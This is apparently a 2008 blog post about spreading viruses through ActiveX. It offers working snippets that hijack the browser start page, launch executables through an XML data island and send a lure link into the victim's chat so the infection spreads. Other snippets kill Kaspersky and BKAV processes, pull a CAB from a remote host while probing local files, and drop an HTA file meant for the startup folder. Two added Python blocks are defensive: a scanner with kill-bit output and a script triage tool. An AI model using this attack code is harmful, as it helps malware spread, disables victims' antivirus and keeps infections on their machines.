Jun 10, 2008

Spreading viruses with ActiveX!


For example, visiting a page with an extension such as html, htm, php or asp... is really dangerous if you have no antivirus or are not using a fully updated browser.

A simple example:

<APPLET ID=”Shl”
CLASSID=”CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B”>
</APPLET>
<script>
Shl.RegWrite (“HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page”, “http://secure-lab.net”);
</script>

If that ActiveX control executes a path containing an exe file once the victim is hit, it is really dangerous: one can create a zombie or install malware...

<span datasrc=”#oExec” datafld=”exploit” dataformatas=”html”></span>
<xml id=”oExec”>
<security><exploit><![CDATA[
<object id=”oFile” classid=”clsid:11111111-1111-1111-1111-111111111111″ codebase=”c:/WINDOWS/calc.exe”></object>
]]></exploit></security>
</xml>

ActiveX is really effective in practice!
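For gateway or mail filtering, the two markup patterns above can be caught statically. The following is an added example, not code from the original post: `scan`, `killbit_reg` and the sample markup are constructed for illustration, the watchlist holds only the CLSIDs that appear on this page, and the kill bit is the standard Internet Explorer registry setting for refusing to instantiate a control.

```python
import re
# CLSIDs instantiated by the snippets on this page; extend with your own list.
WATCHLIST = {"F935DC26-1CF0-11D0-ADB9-00C04FD58A0B",
             "11111111-1111-1111-1111-111111111111",
             "16E349E0-702C-11CF-A3A9-00A0C9034920"}
# Pages copied through blog engines often carry typographic quotes; fold them back.
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2033": '"'})
TAG_RE = re.compile(r"<(?:object|applet)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
CDATA_RE = re.compile(r"<!\[CDATA\[.*?\]\]>", re.S)
LOCAL_EXE = re.compile(r"^(?:file:/*)?[a-z]:[\\/].*\.(?:exe|com|bat|scr|hta)$", re.I)

def scan(html):
    """Return (clsid, reasons) for every <object>/<applet> tag that looks risky."""
    text = html.translate(QUOTES)
    cdata = [m.span() for m in CDATA_RE.finditer(text)]
    findings = []
    for tag in TAG_RE.finditer(text):
        attrs = {k.lower(): a or b or c for k, a, b, c in ATTR_RE.findall(tag.group(1))}
        clsid = re.sub(r"^clsid:", "", attrs.get("classid", ""), flags=re.I).upper()
        codebase = attrs.get("codebase", "")
        reasons = []
        if clsid in WATCHLIST:
            reasons.append("watchlisted CLSID")
        if LOCAL_EXE.match(codebase):
            reasons.append("codebase names a local executable")
        elif re.match(r"https?://", codebase, re.I):
            reasons.append("codebase fetches a remote package")
        if any(start <= tag.start() < end for start, end in cdata):
            reasons.append("tag hidden in a CDATA data island")
        if reasons:
            findings.append((clsid, reasons))
    return findings

def killbit_reg(clsids):
    """Render a .reg file setting the IE kill bit (Compatibility Flags 0x400)."""
    key = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
    out = ["Windows Registry Editor Version 5.00", ""]
    for clsid in sorted(set(clsids)):
        out += [f"[{key}\\{{{clsid}}}]", '"Compatibility Flags"=dword:00000400', ""]
    return "\r\n".join(out)

# Constructed sample: two tags modelled on this page plus one made-up benign control.
SAMPLE = """<applet id="Shl" classid="CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B"></applet>
<xml id="oExec"><![CDATA[<object classid="clsid:11111111-1111-1111-1111-111111111111"
 codebase="c:/WINDOWS/calc.exe"></object>]]></xml>
<object classid="clsid:00000000-0000-0000-0000-0000000000AA" width="300"></object>"""
if __name__ == "__main__":
    print(scan(SAMPLE), killbit_reg(c for c, _ in scan(SAMPLE)), sep="\n")
```

Review the CLSIDs before importing the generated .reg file: a kill bit disables the control for every site, not only hostile ones.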

But how do you turn the victim into a helper who forwards the link, one containing a trojan or virus, to every group? That is simple too: rely on YAHOO CHAT or some other commonly used chat program!

Option Explicit
Dim WshShell
Set WshShell=CreateObject(“WScript.Shell”)
WScript.Sleep 1500
WshShell.AppActivate”Send”
WshShell.SendKeys”Vao site nay di , em de thuong lam http://secure-lab.net/dethuong.jpeg”
WScript.Sleep 200
WshShell.Sendkeys”{Enter}”
WScript.Sleep 20
WshShell.Sendkeys”{Enter}”

This is a VBScript script, edited so that every 10 seconds it sends keys once into the body of the victim's chat, hehe --> out of 9 people, at least one will go and take a look.

Using VBScript to activate things is fun too, for example taking out BKAV, or any antivirus that is not password protected.

For Bkav:

If ProcessExists(“Bkav2006.exe”) Then
ProcessClose(“Bkav2006.exe”)

For Kaspersky:

If ProcessExists(“kis.exe”) Then
ProcessClose(“kis.exe”)

...End Task... done, hehe: the virus can then run freely without fear of being killed by antivirus software.
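Both script behaviours described above leave static traces that a script-file triage step can flag before execution. The following is an added example, not code from the original post: `triage`, the finding labels and the sample scripts are constructed for illustration, and the protected-process list holds only the two names given on this page.

```python
import re

# Typographic quotes appear when such scripts are copied from web pages.
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"'})
# Security-product process names mentioned on this page; extend for your estate.
PROTECTED = {"bkav2006.exe", "kis.exe"}
CALL_RE = re.compile(r'\b(AppActivate|SendKeys|ProcessClose)\b\s*\(?\s*"([^"]*)"', re.I)
URL_RE = re.compile(r"https?://[^\s\"{}]+", re.I)

def triage(script):
    """Return sorted findings for keystroke-injected links and security-process kills."""
    text = script.translate(QUOTES)
    uses_shell = re.search(r'CreateObject\(\s*"WScript\.Shell"', text, re.I) is not None
    focused, findings = None, set()
    for name, arg in CALL_RE.findall(text):
        name = name.lower()
        if name == "appactivate":
            focused = arg  # title of the window that will receive the keystrokes
        elif name == "sendkeys" and uses_shell and focused and URL_RE.search(arg):
            # A URL typed into another application's window is the propagation step.
            findings.add(("keystroke-link", focused, URL_RE.search(arg).group()))
        elif name == "processclose" and arg.lower() in PROTECTED:
            findings.add(("security-process-kill", arg.lower(), ""))
    return sorted(findings)

# Constructed samples modelled on the two snippets above (lure URL is a placeholder).
SAMPLE_VBS = '''Set WshShell=CreateObject("WScript.Shell")
WshShell.AppActivate"Send"
WshShell.SendKeys"look at this http://lure.example/pic.jpeg"
WshShell.Sendkeys"{Enter}"'''
SAMPLE_AU3 = '''If ProcessExists("kis.exe") Then
ProcessClose("kis.exe")'''

if __name__ == "__main__":
    for sample in (SAMPLE_VBS, SAMPLE_AU3):
        print(triage(sample))
```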

<html>

<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″>
<title>Huehacking</title>
</head>

<body bgcolor=”#FFFFFF”>

<table border=”0″ width=”100%” bgcolor=”#000080″>
<tr>
<td><h1 align=”center”><font color=”#FFFF80″>Huehacking</font></h1>
</td>
</tr>
</table>
<P> loader control …………………

<p>
<object ID=”preloader” NAME=”preloader” WIDTH=”83″ HEIGHT=”27″ align=”baseline” border=”0″
CLASSID=”clsid:16E349E0-702C-11CF-A3A9-00A0C9034920″
codebase=”http://www.huehacking.info/install.cab”>
<param name=”_ExtentX” value=”10″>
<param name=”_ExtentY” value=”10″>
<param name=”enable” value=”0″>ActiveX not found or enabled
</object>
</p>
<script LANGUAGE=”JavaScript”>

testNo=-1;

function buildArray()
{
//define data
c=0;

files=new Array();
found=new Array();
missing=new Array();
results=new Array();

files[c]=”c:\\autoexec.bat”;
found[c]=”A DOS/Win9x or NT platform”;
missing[c]=”Windows NT?”;
c++;

files[c]=”c:\\boot.ini”;
found[c]=”an NT system”;
missing[c]=”no NT”;
c++;

files[c]=”http://localhost/”;
found[c]=”Running a local web server”;
missing[c]=”no local web server”;
c++;

files[c]=”c:\\windows\\wscript.exe”;
found[c]=”windows scripting”;
missing[c]=”no windows scripting found.”;
c++;

files[c]=”c:\\Windows\\System\\D3DRM.DLL”;
found[c]=”Win9x installation of DirectX”;
missing[c]=”No copy of DirectX in the default installation location”;
c++;

files[c]=”c:\\Windows\\tour98.exe”;
found[c]=”Windows 98″;
missing[c]=”No Windows 98 in the usual place”;
c++;

files[c]=”c:\\Winnt\\system32\\gdi32.dll”;
found[c]=”A copy of NT under c:\winnt”;
missing[c]=”no copy of NT there”;
c++;

files[c]=”c:\\Windows\\system32\\gdi32.dll”;
found[c]=”A copy of NT under c:\windows: probably an upgrade installation”;
missing[c]=”no copy of NT there”;
c++;
/*
files[c]=”c:\\WindowsNT\\system32\\gdi32.dll”;
found[c]=”A copy of NT under c:\windowsNT : probably an MIS installation”;
missing[c]=”no copy of NT there”;
c++;

files[c]=”c:\\Program Files\\WinZip\\winzip32.exe”;
found[c]=”WinZip. But is it registered?”;
missing[c]=”no copy of Winzip in the default install location”;
c++;
*/

}

function println(text)
{
output.value=output.value+”\r\n”+text;
}

function resetTest()
{
output.value=””;
testNo=-1;
}

function TestElementFailed()
{
if(testNo>=0 && testNo<files.length)
{
println(preloader.URL+” missing: “+ missing[testNo]);
startNextTest();
}
}

function TestElementSucceeded()
{
if(testNo>=0 && testNo<files.length)
{
println(preloader.URL+” found: “+found[testNo]);
startNextTest();
}
}

function startNextTest()
{
testNo++;
preloader.Enable=0;
if(testNo>=files.length)
{
println(“***Test completed***”);
}
else
{
preloader.URL=files[testNo];
preloader.Enable=1;
}
}

function startUp()
{
resetTest();
output.value=”***starting***”
buildArray();
startNextTest();
}
//–>

</script>
<!– *********************************************
* Event handler: success
********************************************* –>
<script LANGUAGE=”JavaScript” FOR=”preloader” EVENT=”Complete()”>

<!–
TestElementSucceeded()

//–>

</script>
<!– *********************************************
* Event handler: failure
********************************************* –>
<script LANGUAGE=”JavaScript” FOR=”preloader” EVENT=”Error()”>

<!–
TestElementFailed()

//–>

</script>
<!– *********************************************
* a link to start the process
********************************************* –>

<h2 align=”center”><a href=”javascript:startUp()”>Run the Test</a></h2>
<!– *********************************************
* A form for the results
********************************************* –>

<p><textarea rows=”20″ cols=”80″ name=”output”>
</textarea></p>
<IMG SRC=”../Artwork/bar.jpg” WIDTH=”500″ HEIGHT=”20″ ALIGN=”BOTTOM” BORDER=”0″></P>

<P> [<a href=”./”>back</a>] [<A HREF=”../”>home</A>] [<A HREF=”../copyright.html”>copyright</A> ] [<A HREF=”../software.html”>software</A>]

</body>
</html>

<object data=”ebookhacking.xla” id=”sh1″ width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn=”C:\\huehacking.hta”;
sh1.object.SaveAs(fn,6);
//sh1.object.SaveAs(“C:\\windows\\Start
Menu\\Programs\\StartUp\\huehacking.hta”,6);
alert(fn+” sucessfully written”);
}
setTimeout(“f()”,5000);
</SCRIPT>
